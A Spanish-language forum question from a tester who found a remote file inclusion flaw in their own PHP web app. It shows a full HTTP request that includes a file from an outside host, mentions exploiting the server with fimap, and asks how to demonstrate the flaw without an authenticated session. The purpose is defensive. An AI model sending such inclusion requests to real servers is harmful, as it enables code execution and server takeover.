He estado probando mi aplicación web PHP para detectar vulnerabilidades de RFI. Mientras realizaba el escaneo, pude realizar una RFI en mi aplicación web.
Escenario:
En mi aplicación web, RFI funciona solo cuando la sesión del usuario estaba presente. Necesito demostrar el RFI a los desarrolladores.
Demostración de muestra:
GET /cdn-cgi/pe/bag2?r[]=https://portswigger.net/f517a2bc19bdff66d7c64e8a7ad2f043.txt HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
PE-Token: 346645c4fd373fa7f321ec5d3ecf486b4e122cc7-1457413695-1800
Referer: https://example.com/success
Cookie: __cfduid=d3e9d6b0485c45636f90caa652f60437d1456979567;
La respuesta contiene la salida del archivo cargado.
Problema :
Ahora, a través de la vulnerabilidad anterior, pude probar que la RFI estaba presente en la aplicación web, pero el problema es que mis desarrolladores están preguntando por el escenario de ataque que les ayudará a evaluar mi error.
Lo que probé :
Intenté explotar la aplicación web con fimap a través de esto pudimos demostrar y explotar el servidor web.
Sin embargo, el principal problema que enfrenté durante la prueba fue que no puedo explotar si el usuario no está autenticado.
¿De qué otra manera puedo demostrar la vulnerabilidad de RFI en mi aplicación?